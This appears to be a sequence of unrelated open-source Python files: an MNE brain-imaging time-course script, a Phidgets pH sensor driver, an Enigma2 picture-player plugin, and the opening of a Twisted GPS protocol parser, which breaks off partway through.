sys.stdout.write("\n%s the following test:\n" % description)
else:
fmt = "\n%s the following %d tests:\n"
sys.stdout.write(fmt % (description, len(tests)))
sys.stdout.write("\t" + "\n\t".join(tests) + "\n")
if opts.passed:
report("Passed", passed)
report("Failed", failed)
report("No result from", no_result)
if failed:
return 1
else:
return 0
if __name__ == "__main__":
sys.exit(main())
|
MadsJensen/RP_scripts
|
refs/heads/master
|
extract_ts_epochs.py
|
1
|
import sys
import numpy as np
import mne
from mne.minimum_norm import read_inverse_operator, apply_inverse_epochs
from my_settings import (mne_folder, epochs_folder, source_folder, conditions)
subject = sys.argv[1]
method = "dSPM"
snr = 3.
lambda2 = 1. / snr**2
# labels = mne.read_labels_from_annot(
# subject=subject, parc="PALS_B12_Brodmann", regexp="Brodmann")
labels = mne.read_labels_from_annot(subject, parc="aparc")
for condition in conditions:
inv = read_inverse_operator(mne_folder + "%s_%s-inv.fif" % (subject,
condition))
epochs = mne.read_epochs(epochs_folder + "%s_%s-epo.fif" % (subject,
condition))
stcs = apply_inverse_epochs(
epochs["press"], inv, lambda2, method=method, pick_ori=None)
ts = [
mne.extract_label_time_course(
stc, labels, inv["src"], mode="mean_flip") for stc in stcs
]
# for h, tc in enumerate(ts):
# for j, t in enumerate(tc):
# t *= np.sign(t[np.argmax(np.abs(t))])
# tc[j, :] = t
# ts[h] = tc
ts = np.asarray(ts)
# stc.save(source_folder + "%s_%s_ar_epo" % (subject, condition))
np.save(source_folder + "ave_ts/%s_%s_ts_DKT_snr-3-epo.npy" %
(subject, condition), ts)
del epochs
del stcs
del ts
|
trevstanhope/row-assist
|
refs/heads/master
|
libs/python-phidget/Phidgets/Devices/PHSensor.py
|
11
|
"""Copyright 2012 Phidgets Inc.
This work is licensed under the Creative Commons Attribution 2.5 Canada License.
To view a copy of this license, visit http://creativecommons.org/licenses/by/2.5/ca/
"""
__author__ = 'Adam Stelmack'
__version__ = '2.1.8'
__date__ = 'May 17 2010'
import threading
from ctypes import *
from Phidgets.PhidgetLibrary import PhidgetLibrary
from Phidgets.Phidget import Phidget
from Phidgets.PhidgetException import PhidgetErrorCodes, PhidgetException
from Phidgets.Events.Events import PHChangeEventArgs
import sys
class PHSensor(Phidget):
"""This class represents a Phidget PH Sensor.
All methods to read PH data from the PH Sensor are implemented in this class.
The Phidget PH Sensor provides one standard PH sensor input.
See your device's User Guide for more specific API details, technical information, and revision details.
The User Guide, along with other resources, can be found on the product page for your device.
Extends:
Phidget
"""
def __init__(self):
"""The Constructor Method for the PHSensor Class
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
"""
Phidget.__init__(self)
self.__phChange = None
self.__onPhChange = None
try:
PhidgetLibrary.getDll().CPhidgetPHSensor_create(byref(self.handle))
except RuntimeError:
raise
if sys.platform == 'win32':
self.__PHCHANGEHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p, c_double)
elif sys.platform == 'darwin' or sys.platform == 'linux2':
self.__PHCHANGEHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p, c_double)
def __del__(self):
"""The Destructor Method for the PHSensor Class
"""
Phidget.dispose(self)
def getPH(self):
"""Returns the measured pH.
This value can range from between getPHMin and getPHMax, but some of this range is likely outside of the valid range of most ph sensors.
For example, when there is no ph sensor attached, the board will often report an (invalid) ph of 15, which while technically within a valid
ph range, is unlikely to be seen.
Returns:
The current pH reading <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
phVal = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPH(self.handle, byref(phVal))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return phVal.value
def getPHMax(self):
"""Returns the maximum ph that will be returned by the ph sensor input.
Returns:
The Maximum pH readable <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
phMax = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPHMax(self.handle, byref(phMax))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return phMax.value
def getPHMin(self):
"""Returns the minimum ph that will be returned by the ph sensor input.
Returns:
The Minimum pH readable <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
phMin = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPHMin(self.handle, byref(phMin))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return phMin.value
def __nativePHChangeEvent(self, handle, usrptr, value):
if self.__phChange != None:
self.__phChange(PHChangeEventArgs(self, value))
return 0
def setOnPHChangeHandler(self, phChangeHandler):
"""Sets the PHChange Event Handler.
The ph change handler is a method that will be called when the pH has changed by at least the Trigger that has been set.
Parameters:
phChangeHandler: hook to the phChangeHandler callback function.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
if phChangeHandler == None:
self.__phChange = None
self.__onPhChange = None
else:
self.__phChange = phChangeHandler
self.__onPhChange = self.__PHCHANGEHANDLER(self.__nativePHChangeEvent)
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_set_OnPHChange_Handler(self.handle, self.__onPhChange, None)
except RuntimeError:
self.__phChange = None
self.__onPhChange = None
raise
if result > 0:
raise PhidgetException(result)
def getPHChangeTrigger(self):
"""Returns the pH change trigger.
This is how much the pH much change between successive PHChangeEvents. By default this value is set to 0.05
Returns:
The current pH change Trigger <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
sensitivity = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPHChangeTrigger(self.handle, byref(sensitivity))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return sensitivity.value
def setPHChangeTrigger(self, value):
"""Sets the pH change trigger.
This is how much the pH much change between successive PHChangeEvents. By default this value is set to 0.05.
Parameters:
value<double>: The requested pH change trigger value.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or the trigger value is out of range.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_setPHChangeTrigger(self.handle, c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getPotential(self):
"""Returns the Potential, in millivolts.
This returns the actual voltage potential measured by the A/D.
This value will always be between getPotentialMin and getPotentialMax.
This is the value that is internally used to calculate pH in the library.
Returns:
The current potential <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
potential = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPotential(self.handle, byref(potential))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return potential.value
def getPotentialMax(self):
"""Returns the maximum potential that will be returned by the ph sensor input.
Returns:
The Maximum potential in millivolts <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
potentialMax = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPotentialMax(self.handle, byref(potentialMax))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return potentialMax.value
def getPotentialMin(self):
"""Returns the minimum potential that will be returned by the ph sensor input.
Returns:
The Minimum potential in millivolts <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
potentialMin = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_getPotentialMin(self.handle, byref(potentialMin))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return potentialMin.value
def setTemperature(self, value):
"""Sets the probe temperature in degrees celcius.
This value is used while calculating the PH. The default value in the libary is 20 degrees celcius.
If the temperature of the liquid being measured is not 20 degrees, then it should be measued and set for maximum accuracy.
Note: All that this does is set a value in the library that is used for calculating ph. This does not set anything in the hardware itself.
Parameters:
value<double>: the requested temperature.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetPHSensor_setTemperature (self.handle, c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
|
kingvuplus/b-p
|
refs/heads/master
|
lib/python/Plugins/Extensions/PicturePlayer/ui.py
|
17
|
from enigma import ePicLoad, eTimer, getDesktop, gMainDC, eSize
from Screens.Screen import Screen
from Tools.Directories import resolveFilename, pathExists, SCOPE_MEDIA, SCOPE_CURRENT_SKIN
from Components.Pixmap import Pixmap, MovingPixmap
from Components.ActionMap import ActionMap, NumberActionMap
from Components.Sources.StaticText import StaticText
from Components.FileList import FileList
from Components.AVSwitch import AVSwitch
from Components.Sources.List import List
from Components.ConfigList import ConfigList, ConfigListScreen
from Components.config import config, ConfigSubsection, ConfigInteger, ConfigSelection, ConfigText, ConfigYesNo, KEY_LEFT, KEY_RIGHT, KEY_0, getConfigListEntry
import skin
def getScale():
return AVSwitch().getFramebufferScale()
config.pic = ConfigSubsection()
config.pic.framesize = ConfigInteger(default=30, limits=(5, 99))
config.pic.slidetime = ConfigInteger(default=10, limits=(1, 60))
config.pic.resize = ConfigSelection(default="1", choices = [("0", _("simple")), ("1", _("better"))])
config.pic.cache = ConfigYesNo(default=True)
config.pic.lastDir = ConfigText(default=resolveFilename(SCOPE_MEDIA))
config.pic.infoline = ConfigYesNo(default=True)
config.pic.loop = ConfigYesNo(default=True)
config.pic.bgcolor = ConfigSelection(default="#00000000", choices = [("#00000000", _("black")),("#009eb9ff", _("blue")),("#00ff5a51", _("red")), ("#00ffe875", _("yellow")), ("#0038FF48", _("green"))])
config.pic.autoOrientation = ConfigYesNo(default=False)
config.pic.textcolor = ConfigSelection(default="#0038FF48", choices = [("#00000000", _("black")),("#009eb9ff", _("blue")),("#00ff5a51", _("red")), ("#00ffe875", _("yellow")), ("#0038FF48", _("green"))])
class picshow(Screen):
skin = """
<screen name="picshow" position="center,center" size="560,440" title="Picture player" >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/yellow.png" position="280,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
<widget source="key_yellow" render="Label" position="280,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#a08500" transparent="1" />
<widget source="label" render="Label" position="5,55" size="350,140" font="Regular;19" backgroundColor="#25062748" transparent="1" />
<widget name="thn" position="360,40" size="180,160" alphatest="on" />
<widget name="filelist" position="5,205" zPosition="2" size="550,230" scrollbarMode="showOnDemand" />
</screen>"""
def __init__(self, session):
Screen.__init__(self, session)
self["actions"] = ActionMap(["OkCancelActions", "ColorActions", "DirectionActions", "MenuActions"],
{
"cancel": self.KeyExit,
"red": self.KeyExit,
"green": self.KeyGreen,
"yellow": self.KeyYellow,
"menu": self.KeyMenu,
"ok": self.KeyOk
}, -1)
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText(_("Thumbnails"))
self["key_yellow"] = StaticText("")
self["label"] = StaticText("")
self["thn"] = Pixmap()
currDir = config.pic.lastDir.value
if not pathExists(currDir):
currDir = "/"
self.filelist = FileList(currDir, matchingPattern = "(?i)^.*\.(jpeg|jpg|jpe|png|bmp|gif)")
self["filelist"] = self.filelist
self["filelist"].onSelectionChanged.append(self.selectionChanged)
self.ThumbTimer = eTimer()
self.ThumbTimer.callback.append(self.showThumb)
self.picload = ePicLoad()
self.picload.PictureData.get().append(self.showPic)
self.onLayoutFinish.append(self.setConf)
def showPic(self, picInfo=""):
ptr = self.picload.getData()
if ptr != None:
self["thn"].instance.setPixmap(ptr.__deref__())
self["thn"].show()
text = picInfo.split('\n',1)
self["label"].setText(text[1])
self["key_yellow"].setText(_("Exif"))
def showThumb(self):
if not self.filelist.canDescent():
if self.filelist.getCurrentDirectory() and self.filelist.getFilename():
if self.picload.getThumbnail(self.filelist.getCurrentDirectory() + self.filelist.getFilename()) == 1:
self.ThumbTimer.start(500, True)
def selectionChanged(self):
if not self.filelist.canDescent():
self.ThumbTimer.start(500, True)
else:
self["label"].setText("")
self["thn"].hide()
self["key_yellow"].setText("")
def KeyGreen(self):
#if not self.filelist.canDescent():
self.session.openWithCallback(self.callbackView, Pic_Thumb, self.filelist.getFileList(), self.filelist.getSelectionIndex(), self.filelist.getCurrentDirectory())
def KeyYellow(self):
if not self.filelist.canDescent():
self.session.open(Pic_Exif, self.picload.getInfo(self.filelist.getCurrentDirectory() + self.filelist.getFilename()))
def KeyMenu(self):
self.session.openWithCallback(self.setConf, Pic_Setup)
def KeyOk(self):
if self.filelist.canDescent():
self.filelist.descent()
else:
self.session.openWithCallback(self.callbackView, Pic_Full_View, self.filelist.getFileList(), self.filelist.getSelectionIndex(), self.filelist.getCurrentDirectory())
def setConf(self, retval=None):
self.setTitle(_("Picture player"))
sc = getScale()
#0=Width 1=Height 2=Aspect 3=use_cache 4=resize_type 5=Background(#AARRGGBB)
self.picload.setPara((self["thn"].instance.size().width(), self["thn"].instance.size().height(), sc[0], sc[1], config.pic.cache.value, int(config.pic.resize.value), "#00000000", config.pic.autoOrientation.value))
def callbackView(self, val=0):
if val > 0:
self.filelist.moveToIndex(val)
def KeyExit(self):
del self.picload
if self.filelist.getCurrentDirectory() is None:
config.pic.lastDir.value = "/"
else:
config.pic.lastDir.value = self.filelist.getCurrentDirectory()
config.pic.save()
self.close()
#------------------------------------------------------------------------------------------
class Pic_Setup(Screen, ConfigListScreen):
def __init__(self, session):
Screen.__init__(self, session)
# for the skin: first try MediaPlayerSettings, then Setup, this allows individual skinning
self.skinName = ["PicturePlayerSetup", "Setup"]
self.setup_title = _("Settings")
self.onChangedEntry = []
self.session = session
ConfigListScreen.__init__(self, [], session = session, on_change = self.changedEntry)
self["actions"] = ActionMap(["SetupActions", "MenuActions"],
{
"cancel": self.keyCancel,
"save": self.keySave,
"ok": self.keySave,
"menu": self.closeRecursive,
}, -2)
self["key_red"] = StaticText(_("Cancel"))
self["key_green"] = StaticText(_("OK"))
self.createSetup()
self.onLayoutFinish.append(self.layoutFinished)
def layoutFinished(self):
self.setTitle(self.setup_title)
def createSetup(self):
setup_list = [
getConfigListEntry(_("Slide show interval (sec.)"), config.pic.slidetime),
getConfigListEntry(_("Scaling mode"), config.pic.resize),
getConfigListEntry(_("Cache thumbnails"), config.pic.cache),
getConfigListEntry(_("Show info line"), config.pic.infoline),
getConfigListEntry(_("Frame size in full view"), config.pic.framesize),
getConfigListEntry(_("Slide picture in loop"), config.pic.loop),
getConfigListEntry(_("Background color"), config.pic.bgcolor),
getConfigListEntry(_("Text color"), config.pic.textcolor),
getConfigListEntry(_("Fulview resulution"), config.usage.pic_resolution),
getConfigListEntry(_("Auto EXIF Orientation rotation/flipping"), config.pic.autoOrientation),
]
self["config"].list = setup_list
self["config"].l.setList(setup_list)
def keyLeft(self):
ConfigListScreen.keyLeft(self)
def keyRight(self):
ConfigListScreen.keyRight(self)
# for summary:
def changedEntry(self):
for x in self.onChangedEntry:
x()
def getCurrentEntry(self):
return self["config"].getCurrent()[0]
def getCurrentValue(self):
return str(self["config"].getCurrent()[1].getText())
def createSummary(self):
from Screens.Setup import SetupSummary
return SetupSummary
#---------------------------------------------------------------------------
class Pic_Exif(Screen):
skin = """
<screen name="Pic_Exif" position="center,center" size="560,360" title="Info" >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="menu" render="Listbox" position="5,50" size="550,310" scrollbarMode="showOnDemand" selectionDisabled="1" >
<convert type="TemplatedMultiContent">
{
"template": [ MultiContentEntryText(pos = (5, 5), size = (250, 30), flags = RT_HALIGN_LEFT, text = 0), MultiContentEntryText(pos = (260, 5), size = (290, 30), flags = RT_HALIGN_LEFT, text = 1)],
"fonts": [gFont("Regular", 20)],
"itemHeight": 30
}
</convert>
</widget>
</screen>"""
def __init__(self, session, exiflist):
Screen.__init__(self, session)
self["actions"] = ActionMap(["SetupActions", "ColorActions"],
{
"cancel": self.close
}, -1)
self["key_red"] = StaticText(_("Close"))
exifdesc = [_("filename")+':', "EXIF-Version:", "Make:", "Camera:", "Date/Time:", "Width / Height:", "Flash used:", "Orientation:", "User Comments:", "Metering Mode:", "Exposure Program:", "Light Source:", "CompressedBitsPerPixel:", "ISO Speed Rating:", "X-Resolution:", "Y-Resolution:", "Resolution Unit:", "Brightness:", "Exposure Time:", "Exposure Bias:", "Distance:", "CCD-Width:", "ApertureFNumber:"]
list = []
for x in range(len(exiflist)):
if x>0:
list.append((exifdesc[x], exiflist[x]))
else:
name = exiflist[x].split('/')[-1]
list.append((exifdesc[x], name))
self["menu"] = List(list)
self.onLayoutFinish.append(self.layoutFinished)
def layoutFinished(self):
self.setTitle(_("Info"))
#----------------------------------------------------------------------------------------
T_INDEX = 0
T_FRAME_POS = 1
T_PAGE = 2
T_NAME = 3
T_FULL = 4
class Pic_Thumb(Screen):
def __init__(self, session, piclist, lastindex, path):
self.textcolor = config.pic.textcolor.value
self.color = config.pic.bgcolor.value
self.spaceX, self.picX, self.spaceY, self.picY, textsize, thumtxt = skin.parameters.get("PicturePlayerThumb",(35, 190, 30, 200, 20, 14))
pic_frame = resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/icons/pic_frame.png")
size_w = getDesktop(0).size().width()
size_h = getDesktop(0).size().height()
self.thumbsX = size_w / (self.spaceX + self.picX) # thumbnails in X
self.thumbsY = size_h / (self.spaceY + self.picY) # thumbnails in Y
self.thumbsC = self.thumbsX * self.thumbsY # all thumbnails
self.positionlist = []
skincontent = ""
posX = -1
for x in range(self.thumbsC):
posY = x / self.thumbsX
posX += 1
if posX >= self.thumbsX:
posX = 0
absX = self.spaceX + (posX*(self.spaceX + self.picX))
absY = self.spaceY + (posY*(self.spaceY + self.picY))
self.positionlist.append((absX, absY))
skincontent += "<widget source=\"label" + str(x) + "\" render=\"Label\" position=\"" + str(absX+5) + "," + str(absY+self.picY-textsize) + "\" size=\"" + str(self.picX - 10) + "," + str(textsize) \
+ "\" font=\"Regular;" + str(thumtxt) + "\" zPosition=\"2\" transparent=\"1\" noWrap=\"1\" foregroundColor=\"" + self.textcolor + "\" />"
skincontent += "<widget name=\"thumb" + str(x) + "\" position=\"" + str(absX+5)+ "," + str(absY+5) + "\" size=\"" + str(self.picX -10) + "," + str(self.picY - (textsize*2)) + "\" zPosition=\"2\" transparent=\"1\" alphatest=\"on\" />"
# Screen, backgroundlabel and MovingPixmap
self.skin = "<screen position=\"0,0\" size=\"" + str(size_w) + "," + str(size_h) + "\" flags=\"wfNoBorder\" > \
<eLabel position=\"0,0\" zPosition=\"0\" size=\""+ str(size_w) + "," + str(size_h) + "\" backgroundColor=\"" + self.color + "\" />" \
+ "<widget name=\"frame\" position=\"" + str(self.spaceX)+ "," + str(self.spaceY)+ "\" size=\"" + str(self.picX) + "," + str(self.picY) + "\" pixmap=\"" + pic_frame + "\" zPosition=\"1\" alphatest=\"on\" />" \
+ skincontent + "</screen>"
Screen.__init__(self, session)
self["actions"] = ActionMap(["OkCancelActions", "ColorActions", "DirectionActions", "MovieSelectionActions"],
{
"cancel": self.Exit,
"ok": self.KeyOk,
"left": self.key_left,
"right": self.key_right,
"up": self.key_up,
"down": self.key_down,
"showEventInfo": self.StartExif,
}, -1)
self["frame"] = MovingPixmap()
for x in range(self.thumbsC):
self["label"+str(x)] = StaticText()
self["thumb"+str(x)] = Pixmap()
self.Thumbnaillist = []
self.filelist = []
self.currPage = -1
self.dirlistcount = 0
self.path = path
index = 0
framePos = 0
Page = 0
for x in piclist:
if x[0][1] == False:
self.filelist.append((index, framePos, Page, x[0][0], path + x[0][0]))
index += 1
framePos += 1
if framePos > (self.thumbsC -1):
framePos = 0
Page += 1
else:
self.dirlistcount += 1
self.maxentry = len(self.filelist)-1
self.index = lastindex - self.dirlistcount
if self.index < 0:
self.index = 0
self.picload = ePicLoad()
self.picload.PictureData.get().append(self.showPic)
self.onLayoutFinish.append(self.setPicloadConf)
self.ThumbTimer = eTimer()
self.ThumbTimer.callback.append(self.showPic)
def setPicloadConf(self):
sc = getScale()
self.picload.setPara([self["thumb0"].instance.size().width(), self["thumb0"].instance.size().height(), sc[0], sc[1], config.pic.cache.value, int(config.pic.resize.value), self.color, config.pic.autoOrientation.value])
self.paintFrame()
def paintFrame(self):
#print "index=" + str(self.index)
if self.maxentry < self.index or self.index < 0:
return
pos = self.positionlist[self.filelist[self.index][T_FRAME_POS]]
self["frame"].moveTo( pos[0], pos[1], 1)
self["frame"].startMoving()
if self.currPage != self.filelist[self.index][T_PAGE]:
self.currPage = self.filelist[self.index][T_PAGE]
self.newPage()
def newPage(self):
self.Thumbnaillist = []
#clear Labels and Thumbnail
for x in range(self.thumbsC):
self["label"+str(x)].setText("")
self["thumb"+str(x)].hide()
#paint Labels and fill Thumbnail-List
for x in self.filelist:
if x[T_PAGE] == self.currPage:
self["label"+str(x[T_FRAME_POS])].setText("(" + str(x[T_INDEX]+1) + ") " + x[T_NAME])
self.Thumbnaillist.append([0, x[T_FRAME_POS], x[T_FULL]])
#paint Thumbnail start
self.showPic()
def showPic(self, picInfo=""):
for x in range(len(self.Thumbnaillist)):
if self.Thumbnaillist[x][0] == 0:
if self.picload.getThumbnail(self.Thumbnaillist[x][2]) == 1: #zu tun probier noch mal
self.ThumbTimer.start(500, True)
else:
self.Thumbnaillist[x][0] = 1
break
elif self.Thumbnaillist[x][0] == 1:
self.Thumbnaillist[x][0] = 2
ptr = self.picload.getData()
if ptr != None:
self["thumb" + str(self.Thumbnaillist[x][1])].instance.setPixmap(ptr.__deref__())
self["thumb" + str(self.Thumbnaillist[x][1])].show()
def key_left(self):
self.index -= 1
if self.index < 0:
self.index = self.maxentry
self.paintFrame()
def key_right(self):
self.index += 1
if self.index > self.maxentry:
self.index = 0
self.paintFrame()
def key_up(self):
self.index -= self.thumbsX
if self.index < 0:
self.index =self.maxentry
self.paintFrame()
def key_down(self):
self.index += self.thumbsX
if self.index > self.maxentry:
self.index = 0
self.paintFrame()
def StartExif(self):
if self.maxentry < 0:
return
self.session.open(Pic_Exif, self.picload.getInfo(self.filelist[self.index][T_FULL]))
def KeyOk(self):
if self.maxentry < 0:
return
self.old_index = self.index
self.session.openWithCallback(self.callbackView, Pic_Full_View, self.filelist, self.index, self.path)
def callbackView(self, val=0):
self.index = val
if self.old_index != self.index:
self.paintFrame()
def Exit(self):
del self.picload
self.close(self.index + self.dirlistcount)
#---------------------------------------------------------------------------
class Pic_Full_View(Screen):
def __init__(self, session, filelist, index, path):
self.textcolor = config.pic.textcolor.value
self.bgcolor = config.pic.bgcolor.value
space = config.pic.framesize.value
self.size_w = size_w = getDesktop(0).size().width()
self.size_h = size_h = getDesktop(0).size().height()
if config.usage.pic_resolution.value and (size_w, size_h) != eval(config.usage.pic_resolution.value):
(size_w, size_h) = eval(config.usage.pic_resolution.value)
gMainDC.getInstance().setResolution(size_w, size_h)
getDesktop(0).resize(eSize(size_w, size_h))
self.skin = "<screen position=\"0,0\" size=\"" + str(size_w) + "," + str(size_h) + "\" flags=\"wfNoBorder\" > \
<eLabel position=\"0,0\" zPosition=\"0\" size=\""+ str(size_w) + "," + str(size_h) + "\" backgroundColor=\""+ self.bgcolor +"\" /><widget name=\"pic\" position=\"" + str(space) + "," + str(space) + "\" size=\"" + str(size_w-(space*2)) + "," + str(size_h-(space*2)) + "\" zPosition=\"1\" alphatest=\"on\" /> \
<widget name=\"point\" position=\""+ str(space+5) + "," + str(space+2) + "\" size=\"20,20\" zPosition=\"2\" pixmap=\"skin_default/icons/record.png\" alphatest=\"on\" /> \
<widget name=\"play_icon\" position=\""+ str(space+25) + "," + str(space+2) + "\" size=\"20,20\" zPosition=\"2\" pixmap=\"skin_default/icons/ico_mp_play.png\" alphatest=\"on\" /> \
<widget source=\"file\" render=\"Label\" position=\""+ str(space+45) + "," + str(space) + "\" size=\""+ str(size_w-(space*2)-50) + ",25\" font=\"Regular;20\" borderWidth=\"1\" borderColor=\"#000000\" halign=\"left\" foregroundColor=\"" + self.textcolor + "\" zPosition=\"2\" noWrap=\"1\" transparent=\"1\" /></screen>"
Screen.__init__(self, session)
self["actions"] = ActionMap(["OkCancelActions", "ColorActions", "DirectionActions", "MovieSelectionActions"],
{
"cancel": self.Exit,
"green": self.PlayPause,
"yellow": self.PlayPause,
"blue": self.nextPic,
"red": self.prevPic,
"left": self.prevPic,
"right": self.nextPic,
"showEventInfo": self.StartExif,
"contextMenu": self.KeyMenu,
}, -1)
self["point"] = Pixmap()
self["pic"] = Pixmap()
self["play_icon"] = Pixmap()
self["file"] = StaticText(_("please wait, loading picture..."))
self.old_index = 0
self.filelist = []
self.lastindex = index
self.currPic = []
self.shownow = True
self.dirlistcount = 0
for x in filelist:
if len(filelist[0]) == 3: #orig. filelist
if x[0][1] == False:
self.filelist.append(path + x[0][0])
else:
self.dirlistcount += 1
elif len(filelist[0]) == 2: #scanlist
if x[0][1] == False:
self.filelist.append(x[0][0])
else:
self.dirlistcount += 1
else: # thumbnaillist
self.filelist.append(x[T_FULL])
self.maxentry = len(self.filelist)-1
self.index = index - self.dirlistcount
if self.index < 0:
self.index = 0
self.picload = ePicLoad()
self.picload.PictureData.get().append(self.finish_decode)
self.slideTimer = eTimer()
self.slideTimer.callback.append(self.slidePic)
if self.maxentry >= 0:
self.onLayoutFinish.append(self.setPicloadConf)
def setPicloadConf(self):
self.setConf()
self["play_icon"].hide()
if config.pic.infoline.value == False:
self["file"].setText("")
self.start_decode()
def setConf(self, retval=None):
sc = getScale()
#0=Width 1=Height 2=Aspect 3=use_cache 4=resize_type 5=Background(#AARRGGBB)
self.picload.setPara([self["pic"].instance.size().width(), self["pic"].instance.size().height(), sc[0], sc[1], 0, int(config.pic.resize.value), self.bgcolor, config.pic.autoOrientation.value])
def ShowPicture(self):
if self.shownow and len(self.currPic):
self.shownow = False
if config.pic.infoline.value:
self["file"].setText(self.currPic[0])
else:
self["file"].setText("")
self.lastindex = self.currPic[1]
self["pic"].instance.setPixmap(self.currPic[2].__deref__())
self.currPic = []
self.next()
self.start_decode()
def finish_decode(self, picInfo=""):
self["point"].hide()
ptr = self.picload.getData()
if ptr != None:
text = ""
try:
text = picInfo.split('\n',1)
text = "(" + str(self.index+1) + "/" + str(self.maxentry+1) + ") " + text[0].split('/')[-1]
except:
pass
self.currPic = []
self.currPic.append(text)
self.currPic.append(self.index)
self.currPic.append(ptr)
self.ShowPicture()
def start_decode(self):
self.picload.startDecode(self.filelist[self.index])
self["point"].show()
def next(self):
self.index += 1
if self.index > self.maxentry:
self.index = 0
def prev(self):
self.index -= 1
if self.index < 0:
self.index = self.maxentry
def slidePic(self):
print "slide to next Picture index=" + str(self.lastindex)
if config.pic.loop.value==False and self.lastindex == self.maxentry:
self.PlayPause()
self.shownow = True
self.ShowPicture()
def PlayPause(self):
if self.slideTimer.isActive():
self.slideTimer.stop()
self["play_icon"].hide()
else:
self.slideTimer.start(config.pic.slidetime.value*1000)
self["play_icon"].show()
self.nextPic()
def prevPic(self):
self.currPic = []
self.index = self.lastindex
self.prev()
self.start_decode()
self.shownow = True
def nextPic(self):
self.shownow = True
self.ShowPicture()
def StartExif(self):
if self.maxentry < 0:
return
self.session.open(Pic_Exif, self.picload.getInfo(self.filelist[self.lastindex]))
def KeyMenu(self):
self.session.openWithCallback(self.setConf, Pic_Setup)
def Exit(self):
del self.picload
if config.usage.pic_resolution.value and (self.size_w, self.size_h) != eval(config.usage.pic_resolution.value):
gMainDC.getInstance().setResolution(self.size_w, self.size_h)
getDesktop(0).resize(eSize(self.size_w, self.size_h))
self.close(self.lastindex + self.dirlistcount)
|
pwarren/AGDeviceControl
|
refs/heads/master
|
agdevicecontrol/thirdparty/site-packages/linux2/twisted/protocols/gps/rockwell.py
|
3
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
"""Rockwell Semiconductor Zodiac Serial Protocol
Coded from official protocol specs (Order No. GPS-25, 09/24/1996, Revision 11)
Maintainer: U{Bob Ippolito<mailto:bob@redivi.com>}
The following Rockwell Zodiac messages are currently understood::
EARTHA\\r\\n (a hack to "turn on" a DeLorme Earthmate)
1000 (Geodesic Position Status Output)
1002 (Channel Summary)
1003 (Visible Satellites)
1011 (Receiver ID)
The following Rockwell Zodiac messages require implementation::
None really, the others aren't quite so useful and require bidirectional communication w/ the device
Other desired features::
- Compatability with the DeLorme Tripmate and other devices with this chipset (?)
"""
import struct, operator, math, string
from twisted.internet import protocol
from twisted.python import log
DEBUG = 1
class ZodiacParseError(ValueError):
pass
class Zodiac(protocol.Protocol):
dispatch = {
# Output Messages (* means they get sent by the receiver by default periodically)
1000: 'fix', # *Geodesic Position Status Output
1001: 'ecef', # ECEF Position Status Output
1002: 'channels', # *Channel Summary
1003: 'satellites', # *Visible Satellites
1005: 'dgps', # Differential GPS Status
1007: 'channelmeas', # Channel Measurement
1011: 'id', # *Receiver ID
1012: 'usersettings', # User-Settings Output
1100: 'testresults', # Built-In Test Results
